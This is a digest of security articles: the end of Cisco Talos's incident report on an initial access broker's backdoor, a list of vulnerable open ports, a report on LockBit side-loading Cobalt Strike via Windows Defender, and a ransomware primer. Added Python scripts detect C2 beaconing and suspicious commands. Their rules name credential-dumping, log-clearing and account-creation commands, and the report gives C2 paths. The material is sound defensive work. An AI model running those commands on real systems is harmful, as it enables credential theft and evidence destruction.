In the weeks following the eviction of the attacker from the environment, we observed continuous attempts to re-establish access. In most cases, the attacker was observed targeting weak password rotation hygiene following mandated employee password resets. They primarily targeted users who they believed would have made single character changes to their previous passwords, attempting to leverage these credentials to authenticate and regain access to the Cisco VPN. The attacker was initially leveraging traffic anonymization services like Tor; however, after experiencing limited success, they switched to attempting to establish new VPN sessions from residential IP space using accounts previously compromised during the initial stages of the attack. We also observed the registration of several additional domains referencing the organization while responding to the attack and took action on them before they could be used for malicious purposes. 

After being successfully removed from the environment, the adversary also repeatedly attempted to establish email communications with executive members of the organization but did not make any specific threats or extortion demands. In one email, they included a screenshot showing the directory listing of the Box data that was previously exfiltrated as described earlier. Below is a screenshot of one of the received emails. The adversary redacted the directory listing screenshot prior to sending the email.

BACKDOOR ANALYSIS

The actor dropped a series of payloads onto systems, which we continue to analyze. The first payload is a simple backdoor that takes commands from a command and control (C2) server and executes them on the end system via the Windows Command Processor. The commands are sent in JSON blobs and are standard for a backdoor. There is a “DELETE_SELF” command that removes the backdoor from the system completely. Another, more interesting, command, “WIPE”, instructs the backdoor to remove the last executed command from memory, likely with the intent of negatively impacting forensic analysis on any impacted hosts. 

Commands are retrieved by making HTTP GET requests to the C2 server using the following structure: 

/bot/cmd.php?botid=%.8x

The malware also communicates with the C2 server via HTTP GET requests that feature the following structure: 

/bot/gate.php?botid=%.8x

Following the initial request from the infected system, the C2 server responds with a SHA256 hash. We observed additional requests made every 10 seconds.  

The aforementioned HTTP requests are sent using the following user-agent string: 

Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 Edg/99.0.1150.36 Trailer/95.3.1132.33

The malware also creates a file called “bdata.ini” in the malware’s current working directory that contains a value derived from the volume serial number present on the infected system. In instances where this backdoor was executed, the malware was observed running from the following directory location:  

C:\users\public\win\cmd.exe

The attacker was frequently observed staging tooling in directory locations under the Public user profile on systems from which they were operating.  

Based upon analysis of C2 infrastructure associated with this backdoor, we assess that the C2 server was set up specifically for this attack. 
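The network indicators in this section (the two request paths with a botid formatted by %.8x, the fixed user-agent string, and requests repeating every 10 seconds) can be combined into a proxy-log hunt. The following is an added example, not Cisco Talos code; the proxy records, hostnames, client addresses and botid values are constructed, and the jitter tolerance and minimum request count are assumptions.

```python
import re
from collections import defaultdict
from statistics import median

# %.8x prints at least eight lowercase hex digits.
BOT_URI = re.compile(r"^/bot/(?:cmd|gate)\.php\?botid=[0-9a-f]{8,}$")
BACKDOOR_UA = ("Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 "
               "(KHTML, like Gecko) Chrome/99.0.4844.51 Safari/537.36 "
               "Edg/99.0.1150.36 Trailer/95.3.1132.33")
BEACON_SECONDS = 10  # interval reported in the write-up
TOLERANCE = 2        # assumed allowance for jitter and timestamp rounding
MIN_REQUESTS = 4     # assumed minimum number of hits before judging periodicity


def find_beacons(records):
    """Group matching requests by (client, host) and score each group.

    records: iterable of (epoch_seconds, client, host, uri, user_agent).
    """
    groups = defaultdict(list)
    for ts, client, host, uri, ua in records:
        if BOT_URI.match(uri):
            groups[(client, host)].append((ts, ua))

    findings = []
    for (client, host), hits in sorted(groups.items()):
        times = sorted(ts for ts, _ in hits)
        deltas = [b - a for a, b in zip(times, times[1:])]
        periodic = (len(times) >= MIN_REQUESTS
                    and abs(median(deltas) - BEACON_SECONDS) <= TOLERANCE)
        ua_match = all(ua == BACKDOOR_UA for _, ua in hits)
        findings.append({
            "client": client,
            "host": host,
            "requests": len(times),
            "periodic": periodic,
            "ua_match": ua_match,
            # URI shape alone is a lead; interval plus user-agent raises confidence.
            "confidence": "high" if periodic and ua_match else "medium",
        })
    return findings


# Constructed proxy records.
SAMPLE_RECORDS = [
    (1000, "10.0.0.23", "c2.example.invalid", "/bot/gate.php?botid=0a1b2c3d", BACKDOOR_UA),
    (1005, "10.0.0.40", "www.example.invalid", "/index.php?id=7", "Mozilla/5.0 (constructed)"),
    (1010, "10.0.0.23", "c2.example.invalid", "/bot/cmd.php?botid=0a1b2c3d", BACKDOOR_UA),
    (1020, "10.0.0.23", "c2.example.invalid", "/bot/cmd.php?botid=0a1b2c3d", BACKDOOR_UA),
    (1031, "10.0.0.23", "c2.example.invalid", "/bot/cmd.php?botid=0a1b2c3d", BACKDOOR_UA),
    (1040, "10.0.0.23", "c2.example.invalid", "/bot/cmd.php?botid=0a1b2c3d", BACKDOOR_UA),
    (2000, "10.0.0.40", "scan.example.invalid", "/bot/cmd.php?botid=deadbeef", "curl/8.0 (constructed)"),
]

if __name__ == "__main__":
    for finding in find_beacons(SAMPLE_RECORDS):
        print(finding)
```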

ATTACK ATTRIBUTION

Based upon artifacts obtained, tactics, techniques, and procedures (TTPs) identified, infrastructure used, and a thorough analysis of the backdoor utilized in this attack, we assess with moderate to high confidence that this attack was conducted by an adversary that has been previously identified as an initial access broker (IAB) with ties to both UNC2447 and Lapsus$. IABs typically attempt to obtain privileged access to corporate network environments and then monetize that access by selling it to other threat actors who can then leverage it for a variety of purposes. We have also observed previous activity linking this threat actor to the Yanluowang ransomware gang, including the use of the Yanluowang data leak site for posting data stolen from compromised organizations. 

UNC2447 is a financially-motivated threat actor with a nexus to Russia that has been previously observed conducting ransomware attacks and leveraging a technique known as “double extortion,” in which data is exfiltrated prior to ransomware deployment in an attempt to coerce victims into paying ransom demands. Prior reporting indicates that UNC2447 has been observed operating a variety of ransomware, including FIVEHANDS, HELLOKITTY, and more.

Apart from UNC2447, some of the TTPs discovered during the course of our investigation match those of Lapsus$. Lapsus$ is a threat actor group that is reported to have been responsible for several previous notable breaches of corporate environments. Several arrests of Lapsus$ members were reported earlier this year. Lapsus$ has been observed compromising corporate environments and attempting to exfiltrate sensitive information.

While we did not observe ransomware deployment in this attack, the TTPs used were consistent with “pre-ransomware activity,” activity commonly observed leading up to the deployment of ransomware in victim environments. Many of the TTPs observed are consistent with activity observed by CTIR during previous engagements. Our analysis also suggests reuse of server-side infrastructure associated with these previous engagements as well. In previous engagements, we also did not observe deployment of ransomware in the victim environments. 

CISCO RESPONSE AND RECOMMENDATIONS

Cisco implemented a company-wide password reset immediately upon learning of the incident. CTIR previously observed similar TTPs in numerous investigations since 2021. Our findings and subsequent security protections resulting from those customer engagements helped us slow and contain the attacker’s progression. We created two ClamAV signatures, which are listed below.  

  • Win.Exploit.Kolobko-9950675-0  
  • Win.Backdoor.Kolobko-9950676-0 

Threat actors commonly use social engineering techniques to compromise targets, and despite the frequency of such attacks, organizations continue to face challenges mitigating those threats. User education is paramount in thwarting such attacks, including making sure employees know the legitimate ways that support personnel will contact users so that employees can identify fraudulent attempts to obtain sensitive information. 

Given the actor’s demonstrated proficiency in using a wide array of techniques to obtain initial access, user education is also a key part of countering MFA bypass techniques. Equally important to implementing MFA is ensuring that employees are educated on what to do and how to respond if they get errant push requests on their respective phones. It is also essential to educate employees about who to contact if such incidents do arise to help determine if the event was a technical issue or malicious. 

For Duo, it is beneficial to implement strong device verification by enforcing stricter controls around device status to limit or block enrollment and access from unmanaged or unknown devices. Additionally, leveraging risk detection to highlight events like a brand-new device being used from an unrealistic location or attack patterns like login brute forcing can help detect unauthorized access.

Prior to allowing VPN connections from remote endpoints, ensure that posture checking is configured to enforce a baseline set of security controls. This ensures that the connecting devices match the security requirements present in the environment. This can also prevent rogue devices that have not been previously approved from connecting to the corporate network environment.

Network segmentation is another important security control that organizations should employ, as it provides enhanced protection for high-value assets and also enables more effective detection and response capabilities in situations where an adversary is able to gain initial access into the environment.  

Centralized log collection can help minimize the lack of visibility that results when an attacker takes active steps to remove logs from systems. Ensuring that the log data generated by endpoints is centrally collected and analyzed for anomalous or overtly malicious behavior can provide early indication when an attack is underway.

In many cases, threat actors have been observed targeting the backup infrastructure in an attempt to further remove an organization’s ability to recover following an attack. Ensuring that backups are offline and periodically tested can help mitigate this risk and ensure an organization’s ability to effectively recover following an attack. 

Auditing of command line execution on endpoints can also provide increased visibility into actions being performed on systems in the environment and can be used to detect suspicious execution of built-in Windows utilities, which is commonly observed during intrusions where threat actors rely on benign applications or utilities already present in the environment for enumeration, privilege escalation, and lateral movement activities.  
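The following is an added example, not part of the original Cisco post: one way to turn centrally collected command-line audit data into alerts, using technique IDs from the article's ATT&CK mapping. The log format, host names, regular expressions and the three-techniques-in-30-minutes threshold are all assumptions made for illustration.

```python
import re
from collections import defaultdict
from datetime import datetime, timedelta

# (ATT&CK ID from the article's mapping, description, command-line pattern).
# The patterns are assumptions made for this example, not Cisco's detections.
RULES = [
    ("T1070.001", "Windows event log cleared",
     re.compile(r"\bwevtutil(\.exe)?\s+(cl|clear-log)\b", re.I)),
    ("T1136.001", "local account created",
     re.compile(r"\bnet1?(\.exe)?\s+user\s+.*\s/add\b", re.I)),
    ("T1546.012", "IFEO Debugger value written",
     re.compile(r"\breg(\.exe)?\s+add\s+.*image file execution options.*debugger", re.I)),
    ("T1562.004", "Windows firewall rule changed",
     re.compile(r"\bnetsh(\.exe)?\s+advfirewall\s+.*\b(set|add)\b", re.I)),
    ("T1003.002", "SAM hive saved to disk",
     re.compile(r"\breg(\.exe)?\s+save\s+hklm\\sam\b", re.I)),
]

# Constructed sample (time|host|user|command line), standing in for
# process-creation events exported by a central log collector.
SAMPLE_LOG = r"""
2024-01-15T10:02:11|WS-017|alice|ipconfig /all
2024-01-15T10:05:40|SRV-DC01|svc_admin|net user exampleuser /add
2024-01-15T10:07:02|SRV-DC01|svc_admin|reg add "HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\example.exe" /v Debugger /d C:\example\tool.exe
2024-01-15T10:19:55|SRV-DC01|svc_admin|wevtutil.exe cl Security
2024-01-15T11:30:00|WS-017|alice|wevtutil.exe qe System /c:5
2024-01-15T14:45:09|SRV-FILE02|bob|netsh advfirewall firewall set rule group="remote desktop" new enable=Yes
"""


def parse_log(text):
    """Turn the pipe-delimited export into a list of event dicts."""
    events = []
    for line in text.strip().splitlines():
        ts, host, user, cmd = line.split("|", 3)
        events.append({"time": datetime.fromisoformat(ts), "host": host,
                       "user": user, "cmd": cmd})
    return events


def detect(events):
    """Return one hit per (event, matching rule), in log order."""
    hits = []
    for ev in events:
        for technique, desc, pattern in RULES:
            if pattern.search(ev["cmd"]):
                hits.append({**ev, "technique": technique, "desc": desc})
    return hits


def escalate(hits, min_techniques=3, window=timedelta(minutes=30)):
    """Flag hosts showing several distinct techniques inside one time window.

    A single hit is often routine administration; a cluster on one host is
    the pattern worth paging someone for.
    """
    by_host = defaultdict(list)
    for hit in hits:
        by_host[hit["host"]].append(hit)
    flagged = {}
    for host, host_hits in by_host.items():
        host_hits.sort(key=lambda h: h["time"])
        for i, first in enumerate(host_hits):
            techniques = {h["technique"] for h in host_hits[i:]
                          if h["time"] - first["time"] <= window}
            if len(techniques) >= min_techniques:
                flagged[host] = sorted(techniques)
                break
    return flagged


if __name__ == "__main__":
    all_hits = detect(parse_log(SAMPLE_LOG))
    for h in all_hits:
        print(h["time"], h["host"], h["technique"], h["desc"])
    print("escalate:", escalate(all_hits))
```

Because the events are evaluated on the collector rather than on the endpoint, the log-clearing command is still visible after the local log is gone.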

MITRE ATT&CK MAPPING

All of the previously described TTPs that were observed in this attack are listed below based on the phase of the attack in which they occurred. 

Initial Access 

ATT&CK Technique : Phishing (T1566)

ATT&CK Technique : Valid Accounts (T1078)

Execution 

ATT&CK Technique : System Services: Service Execution (T1569.002)

Persistence 

ATT&CK Technique : Create Account: Local Account (T1136.001)

ATT&CK Technique : Account Manipulation: Device Registration (T1098.005)

Privilege Escalation 

ATT&CK Technique : Event Triggered Execution: Image File Execution Options Injection (T1546.012)

Defense Evasion 

ATT&CK Technique : Indicator Removal on Host (T1070)

ATT&CK Technique : Indicator Removal on Host: Clear Windows Event Logs (T1070.001)

ATT&CK Technique : Masquerading: Match Legitimate Name or Location (T1036.005)

ATT&CK Technique : Impair Defenses: Disable or Modify System Firewall (T1562.004)

ATT&CK Technique : Modify Registry (T1112)

Credential Access 

ATT&CK Technique : OS Credential Dumping: LSASS Memory (T1003.001)

ATT&CK Technique : OS Credential Dumping: Security Account Manager (T1003.002)

ATT&CK Technique : OS Credential Dumping: NTDS (T1003.003)

ATT&CK Technique : Multi-Factor Authentication Request Generation (T1621)

Lateral Movement 

ATT&CK Technique : Remote Services (T1021)

Discovery 

ATT&CK Technique : Query Registry (T1012)

Command and Control 

ATT&CK Technique : Application Layer Protocol: Web Protocols (T1071.001)

ATT&CK Technique : Remote Access Software (T1219)

ATT&CK Technique: Encrypted Channel: Asymmetric Cryptography (T1573.002)

ATT&CK Technique : Proxy: Multi-hop Proxy (T1090.003)

Exfiltration 

ATT&CK Technique : Exfiltration Over Alternative Protocol (T1048)

INDICATORS OF COMPROMISE

The following indicators of compromise were observed associated with this attack. 


POSTED BY NICK BIASINI AT 3:30 PM

Source :
https://blog.talosintelligence.com/2022/08/recent-cyber-attack.html

Open Port Vulnerabilities List

Insufficiently protected open ports can put your IT environment at serious risk. Threat actors often seek to exploit open ports and their applications through spoofing, credential sniffing and other techniques. For example, in 2017, cybercriminals spread WannaCry ransomware by exploiting an SMB vulnerability on port 445. Other examples include the ongoing campaigns targeting Microsoft’s Remote Desktop Protocol (RDP) service running on port 3389.


Read on to learn more about the security risks linked to ports, vulnerable ports that need your attention and ways to enhance the security of open ports.

A Refresher on Ports

Ports are logical constructs that identify a specific type of network service. Each port is linked to a specific protocol, program or service, and has a port number for identification purposes. For instance, secured Hypertext Transfer Protocol (HTTPS) messages always go to port 443 on the server side, while port 1194 is exclusively for OpenVPN.

The most common transport protocols that have port numbers are Transmission Control Protocol (TCP) and User Datagram Protocol (UDP). TCP is a connection-oriented protocol with built-in re-transmission and error recovery. UDP is a connectionless protocol that doesn’t recover or correct errors in messages; it’s faster and has less network overhead traffic than TCP. Both TCP and UDP sit at the transport layer of the TCP/IP stack and use the IP protocol to address and route data on the internet. Software and services are designed to use TCP or UDP, depending on their requirements.

TCP and UDP ports are in one of these three states:

  • Open — The port responds to connection requests.
  • Closed — The port is unreachable, indicating that there is no corresponding service running.
  • Filtered — The firewall is monitoring traffic and blocking certain connection requests to the port.

Security Risks Linked to Ports

Numerous incidents have demonstrated that open ports are most vulnerable to attack when the services listening on them are unpatched, insufficiently protected or misconfigured, which can lead to compromised systems and networks. In these cases, threat actors can use open ports to perform various cyberattacks that exploit the lack of authentication mechanisms in the TCP and UDP protocols. One common example is spoofing, where a malicious actor impersonates a system or a service and sends malicious packets, often in combination with IP spoofing and man-in-the-middle attacks. The campaign against RDP Pipe Plumbing is one of the latest to employ such a tactic. In addition, ports that have been opened on purpose (for instance, on a web server) can be attacked via that port using application-layer attacks such as SQL injection, cross-site request forgery and directory traversal.

Another common technique is the denial of service (DoS) attack, most frequently used in the form of distributed denial of service (DDoS), where attackers send massive numbers of connection requests from various machines to the service on the target in order to deplete its resources.

Vulnerable Ports that Need Your Attention

Any port can be targeted by threat actors, but some are more likely to fall prey to cyberattacks because they commonly have serious shortcomings, such as application vulnerabilities, lack of two-factor authentication and weak credentials.

Here are the most vulnerable ports regularly used in attacks:

Ports 20 and 21 (FTP)

Port 20 and (mainly) port 21 are File Transfer Protocol (FTP) ports that let users send and receive files from servers.

FTP is known for being outdated and insecure. As such, attackers frequently exploit it through:

  • Brute-forcing passwords
  • Anonymous authentication (it’s possible to log into the FTP port with “anonymous” as the username and password)
  • Cross-site scripting
  • Directory traversal attacks

Port 22 (SSH)

Port 22 is for Secure Shell (SSH). It’s a TCP port for ensuring secure access to servers. Hackers can exploit port 22 by using leaked SSH keys or brute-forcing credentials.

Port 23 (Telnet)

Port 23 is used by Telnet, a TCP protocol that connects users to remote computers. For the most part, Telnet has been superseded by SSH, but it’s still used by some websites. Since it’s outdated and insecure, it’s vulnerable to many attacks, including credential brute-forcing, spoofing and credential sniffing.

Port 25 (SMTP)

Port 25 is a Simple Mail Transfer Protocol (SMTP) port for receiving and sending emails. Without proper configuration and protection, this TCP port is vulnerable to spoofing and spamming.

Port 53 (DNS)

Port 53 is for Domain Name System (DNS). It’s a UDP and TCP port for queries and transfers, respectively. This port is particularly vulnerable to DDoS attacks.

Ports 137 and 139 (NetBIOS over TCP) and 445 (SMB)

Server Message Block (SMB) uses port 445 directly and ports 137 and 139 indirectly. Cybercriminals can exploit these ports through:

  • Using the EternalBlue exploit, which takes advantage of SMBv1 vulnerabilities in older versions of Microsoft computers (hackers used EternalBlue on the SMB port to spread WannaCry ransomware in 2017)
  • Capturing NTLM hashes
  • Brute-forcing SMB login credentials

Ports 80, 443, 8080 and 8443 (HTTP and HTTPS)

HTTP and HTTPS are the hottest protocols on the internet, so they’re often targeted by attackers. They’re especially vulnerable to cross-site scripting, SQL injections, cross-site request forgeries and DDoS attacks.

Ports 1433, 1434 and 3306 (Used by Databases)

These are the default ports for SQL Server and MySQL. They are used to distribute malware or are directly attacked in DDoS scenarios. Quite often, attackers probe these ports to find unprotected databases with exploitable default configurations.

Port 3389 (Remote Desktop)

This port is used in conjunction with various vulnerabilities in remote desktop protocols and to probe for leaked or weak user authentication. Remote desktop vulnerabilities are currently the most-used attack type; one example is the BlueKeep vulnerability.

Tips for Strengthening the Security of Open Ports

Luckily, there are ways to enhance the security of open ports. We highly recommend the following six strategies:

1. Patch firewalls regularly.

Your firewall is the gatekeeper to all the other systems and services in your network. Patching keeps your firewalls up to date and repairs vulnerabilities and flaws in your firewall system that cybercriminals could use to gain full access to your systems and data.

2. Check ports regularly.

You should also regularly scan and check your ports. There are three main ways to do this:

  • Command-line tools — If you have the time to scan and check ports manually, use command-line tools to spot and scan open ports. Examples include Netstat and Network Mapper, both of which can be installed on a wide range of operating systems, including Windows and Linux.
  • Port scanners — If you want faster results, consider using a port scanner. It’s a computer program that checks if ports are open, closed or filtered. The process is simple: The scanner transmits a network request to connect to a specific port and captures the response.
  • Vulnerability scanning tools — Solutions of this type can also be used to discover ports that are open or configured with default passwords.

3. Track service configuration changes.

Many services on your network connect to various ports, so it is important to monitor the running states of installed services and continuously track changes to service configuration settings. Services can be vulnerable when they are unpatched or misconfigured.

Using Netwrix Change Tracker, you can harden your systems by tracking unauthorized changes and other suspicious activities. In particular, it provides the following functionality:

  • Actionable alerting about configuration changes
  • Automatic recording, analyzing, validating and verifying of every change
  • Real-time change monitoring
  • Constant application vulnerability monitoring
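As an added example (not from the original article and not Netwrix code), steps 2 and 3 can be scripted on a Linux host by comparing successive `ss -H -tlnp` snapshots against an approved baseline. The two snapshots, the process names and the approved set below are constructed for illustration; the port-to-service table is the article's own list.

```python
import ipaddress
import re
from typing import NamedTuple

# Ports the article lists as commonly attacked, with the service it names.
RISKY_PORTS = {20: "FTP", 21: "FTP", 22: "SSH", 23: "Telnet", 25: "SMTP",
               53: "DNS", 137: "NetBIOS", 139: "NetBIOS", 445: "SMB",
               80: "HTTP", 443: "HTTPS", 8080: "HTTP", 8443: "HTTPS",
               1433: "SQL Server", 1434: "SQL Server", 3306: "MySQL",
               3389: "Remote Desktop"}

# Constructed `ss -H -tlnp` output: yesterday's snapshot and today's.
PREVIOUS_SS = '''
LISTEN 0 128    0.0.0.0:22    0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 128       [::]:22       [::]:* users:(("sshd",pid=812,fd=4))
LISTEN 0 511          *:443         *:* users:(("nginx",pid=950,fd=6))
LISTEN 0 151  127.0.0.1:3306  0.0.0.0:* users:(("mysqld",pid=1203,fd=22))
'''
CURRENT_SS = '''
LISTEN 0 128    0.0.0.0:22    0.0.0.0:* users:(("sshd",pid=812,fd=3))
LISTEN 0 128       [::]:22       [::]:* users:(("sshd",pid=812,fd=4))
LISTEN 0 511          *:443         *:* users:(("nginx",pid=950,fd=6))
LISTEN 0 151    0.0.0.0:3306  0.0.0.0:* users:(("mysqld",pid=1203,fd=22))
LISTEN 0 5      0.0.0.0:23    0.0.0.0:* users:(("in.telnetd",pid=2210,fd=0))
LISTEN 0 4096 127.0.0.53%lo:53 0.0.0.0:* users:(("systemd-resolve",pid=640,fd=14))
'''
# Listeners the (hypothetical) owner of this host has signed off on.
APPROVED = {(22, "sshd"), (443, "nginx")}


class Listener(NamedTuple):
    address: str
    port: int
    process: str
    exposed: bool  # False when the socket is bound to loopback only


def _is_exposed(address):
    """Wildcard and non-loopback binds are reachable from other hosts."""
    if address == "*":
        return True
    host = address.strip("[]").split("%", 1)[0]  # drop IPv6 brackets, %iface
    return not ipaddress.ip_address(host).is_loopback


def parse_listeners(ss_output):
    """Parse LISTEN rows: State Recv-Q Send-Q Local Peer [Process]."""
    listeners = []
    for line in ss_output.splitlines():
        fields = line.split()
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        address, _, port = fields[3].rpartition(":")
        match = re.search(r'\(\("([^"]+)"', line)
        process = match.group(1) if match else "unknown"
        listeners.append(Listener(address, int(port), process,
                                  _is_exposed(address)))
    return listeners


def audit(current, approved, previous=None):
    """Report exposed listeners that are unapproved or newly exposed."""
    def exposed_keys(text):
        return {(l.port, l.process) for l in parse_listeners(text) if l.exposed}

    before = exposed_keys(previous) if previous is not None else None
    findings = []
    for port, process in sorted(exposed_keys(current)):
        reasons = []
        if (port, process) not in approved:
            reasons.append("not in approved baseline")
        if before is not None and (port, process) not in before:
            reasons.append("newly exposed since previous snapshot")
        if reasons:
            findings.append((port, process, RISKY_PORTS.get(port), reasons))
    return findings


if __name__ == "__main__":
    for finding in audit(CURRENT_SS, APPROVED, PREVIOUS_SS):
        print(finding)
```

The MySQL finding shows why the bind address matters: port 3306 was listening in both snapshots, but only the second one exposes it beyond loopback.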

4. Use IDS and IPS tools.

Intrusion detection systems (IDS) and intrusion prevention systems (IPS) can help you prevent attackers from exploiting your ports. They monitor your network, spot possible cybersecurity incidents, log information about them and report the incidents to security administrators. IPS complements your firewalls by identifying suspicious incoming traffic and logging and blocking the attack.

5. Use SSH Keys.

Another option is to use SSH keys. These access credentials are more secure than passwords because decrypting SSH is very difficult, if not impossible. There are two types of SSH keys:

  • Private or identity keys, which identify users and give them access
  • Public or authorized keys, which determine who can access your system

You can use public-key cryptographic algorithms and key generation tools to create SSH keys.

6. Conduct penetration tests and vulnerability assessments.

Consider conducting penetration tests and vulnerability assessments to protect your ports. Although both of these techniques are used to spot vulnerabilities in IT infrastructure, they are quite different. Vulnerability scans only identify and report vulnerabilities, while penetration tests exploit security gaps to determine how attackers can gain unauthorized access to your system.

FAQs

What is an open port vulnerability?

An open port vulnerability is a security gap caused by an open port. Without proper configuration and protection, attackers can use open ports to access your systems and data.

Which ports are most vulnerable?

Certain ports and their applications are more likely to be targeted because they often have weaker credentials and defenses. Common vulnerable ports include:

  • FTP (20, 21)
  • SSH (22)
  • Telnet (23)
  • SMTP (25)
  • DNS (53)
  • NetBIOS over TCP (137, 139)
  • SMB (445)
  • HTTP and HTTPS (80, 443, 8080, 8443)
  • Ports 1433, 1434 and 3306
  • Remote desktop (3389)

Is port 80 a security risk?

Port 80 isn’t inherently a security risk. However, if you leave it open and don’t have the proper configurations in place, attackers can easily use it to access your systems and data. Unlike port 443 (HTTPS), port 80 is unencrypted, making it easy for cybercriminals to access, leak and tamper with sensitive data.

Source :
https://blog.netwrix.com/2022/08/04/open-port-vulnerabilities-list/

LockBit Ransomware Abuses Windows Defender to Deploy Cobalt Strike Payload

A threat actor associated with the LockBit 3.0 ransomware-as-a-service (RaaS) operation has been observed abusing the Windows Defender command-line tool to decrypt and load Cobalt Strike payloads.

According to a report published by SentinelOne last week, the incident occurred after obtaining initial access via the Log4Shell vulnerability against an unpatched VMware Horizon Server.

“Once initial access had been achieved, the threat actors performed a series of enumeration commands and attempted to run multiple post-exploitation tools, including Meterpreter, PowerShell Empire, and a new way to side-load Cobalt Strike,” researchers Julio Dantas, James Haughom, and Julien Reisdorffer said.


LockBit 3.0 (aka LockBit Black), which comes with the tagline “Make Ransomware Great Again!,” is the next iteration of the prolific LockBit RaaS family that emerged in June 2022 to iron out critical weaknesses discovered in its predecessor.

It’s notable for instituting what’s the first-ever bug bounty for a RaaS program. Besides featuring a revamped leak site to name-and-shame non-compliant targets and publish extracted data, it also includes a new search tool to make it easier to find specific victim data.


The use of living-off-the-land (LotL) techniques by cyber intruders, wherein legitimate software and functions available in the system are used for post-exploitation, is not new and is usually seen as an attempt to evade detection by security software.

Earlier this April, a LockBit affiliate was found to have leveraged a VMware command-line utility called VMwareXferlogs.exe to drop Cobalt Strike. What’s different this time around is the use of MpCmdRun.exe to achieve the same goal.

MpCmdRun.exe is a command-line tool for carrying out various functions in Microsoft Defender Antivirus, including scanning for malicious software, collecting diagnostic data, and restoring the service to a previous version, among others.


In the incident analyzed by SentinelOne, the initial access was followed by downloading a Cobalt Strike payload from a remote server, which was subsequently decrypted and loaded using the Windows Defender utility.

“Tools that should receive careful scrutiny are any that either the organization or the organization’s security software have made exceptions for,” the researchers said.

“Products like VMware and Windows Defender have a high prevalence in the enterprise and a high utility to threat actors if they are allowed to operate outside of the installed security controls.”
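One way to apply that scrutiny to the two utilities named above, as an added example that is not from the article or from SentinelOne: check process-creation events for MpCmdRun.exe or VMwareXferlogs.exe running outside their default install directories or under a different file name. The directory patterns are the products' default locations stated as an assumption, the events are constructed, and `Image` and `OriginalFileName` follow the Sysmon process-creation field names.

```python
import ntpath
import re

# Default install directories (lower-cased regexes) for the tools named in
# the article. Assumption: the products use their default install paths.
EXPECTED_DIRS = {
    "mpcmdrun.exe": [
        r"c:\\program files\\windows defender",
        r"c:\\programdata\\microsoft\\windows defender\\platform\\[^\\]+",
    ],
    "vmwarexferlogs.exe": [
        r"c:\\program files\\vmware\\vmware tools",
    ],
}

# Constructed process-creation events (hosts and paths are illustrative).
SAMPLE_EVENTS = [
    {"host": "WS-007", "OriginalFileName": "MpCmdRun.exe",
     "Image": r"C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2205.7-0\MpCmdRun.exe"},
    {"host": "WS-042", "OriginalFileName": "MpCmdRun.exe",
     "Image": r"C:\Users\Public\MpCmdRun.exe"},
    {"host": "SRV-HZN01", "OriginalFileName": "MpCmdRun.exe",
     "Image": r"C:\Windows\Temp\updater.exe"},
    {"host": "SRV-HZN01", "OriginalFileName": "VMwareXferlogs.exe",
     "Image": r"C:\Program Files\VMware\VMware Tools\VMwareXferlogs.exe"},
    {"host": "WS-007", "OriginalFileName": "NOTEPAD.EXE",
     "Image": r"C:\Windows\System32\notepad.exe"},
]


def check_event(event):
    """Return a list of reasons the event is suspicious (empty if none)."""
    # ntpath handles Windows paths correctly on any analysis platform.
    image = ntpath.normcase(ntpath.normpath(event["Image"]))
    disk_name = ntpath.basename(image)
    original = event.get("OriginalFileName", "").lower()

    # Identify the tool by its name on disk or, for renamed copies, by the
    # original file name recorded in the binary's version resource.
    if disk_name in EXPECTED_DIRS:
        tool = disk_name
    elif original in EXPECTED_DIRS:
        tool = original
    else:
        return []

    reasons = []
    if disk_name != tool:
        reasons.append(f"{tool} renamed to {disk_name}")
    directory = ntpath.dirname(image)
    if not any(re.fullmatch(p, directory) for p in EXPECTED_DIRS[tool]):
        reasons.append(f"{tool} outside expected directory: {directory}")
    return reasons


def triage(events):
    """Return (host, reasons) for every event with at least one reason."""
    alerts = []
    for event in events:
        reasons = check_event(event)
        if reasons:
            alerts.append((event["host"], reasons))
    return alerts


if __name__ == "__main__":
    for host, reasons in triage(SAMPLE_EVENTS):
        print(host, "; ".join(reasons))
```

A signed vendor binary in a user-writable directory will load whatever DLLs sit beside it, so the location is the signal here even though the file itself is legitimate.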

The findings come as initial access brokers (IABs) are actively selling access to company networks, including managed service providers (MSPs), to fellow threat actors for profit, in turn offering a way to compromise downstream customers.

In May 2022, cybersecurity authorities from Australia, Canada, New Zealand, the U.K., and the U.S. warned of attacks weaponizing vulnerable managed service providers (MSPs) as an “initial access vector to multiple victim networks, with globally cascading effects.”

“MSPs remain an attractive supply chain target for attackers, particularly IABs,” Huntress researcher Harlan Carvey said, urging companies to secure their networks and implement multi-factor authentication (MFA).

Source :
https://thehackernews.com/2022/08/lockbit-ransomware-abuses-windows.html

What is ransomware and how can you defend your business from it?

Ransomware is a kind of malware used by cybercriminals to stop users from accessing their systems or files; the cybercriminals then threaten to leak, destroy or withhold sensitive information unless a ransom is paid.

Ransomware attacks can target either the data held on computer systems (known as locker ransomware) or devices (crypto-ransomware). In both instances, once a ransom is paid, threat actors typically provide victims with a decryption key or tool to unlock their data or device, though this is not guaranteed.

Oliver Pinson-Roxburgh, CEO of Defense.com, the all-in-one cybersecurity platform, shares knowledge and advice in this article on how ransomware works, how damaging it can be, and how your business can mitigate ransomware attacks from occurring.

What does a ransomware attack comprise?

There are three key elements to a ransomware attack:

Access

In order to deploy malware to encrypt files and gain control, cybercriminals need to initially gain access to an organization’s systems.

Trigger

The attackers have control of the data as soon as the malicious software is activated. The data is encrypted and no longer accessible by the targeted organization.

Demand

The victims will receive an alert that their data is encrypted and cannot be accessed until a ransom is paid.

Big business for cybercriminals

The motives of cybercriminals deploying malware may vary but the end goal is typically that of financial gain.

What is the cost of being targeted by ransomware?

The average pay-out from ransomware attacks has risen from $312,000/£260,000 in 2020 to $570,000/£476,000 in 2021 – an increase of 83%. One report also showed that 66% of organisations surveyed were victims of ransomware attacks in 2021, nearly double that of 2020 (37%). This highlights the need for businesses to understand the risks and implement stronger defenses to combat the threats.

Ransomware continues to rank amongst the most common cyberattacks in 2022, due to its lucrative nature and fairly low level of effort required from the perpetrators. This debilitating attack causes an average downtime of 3 weeks and can have major repercussions for an organization, for its finances, operations and reputation.

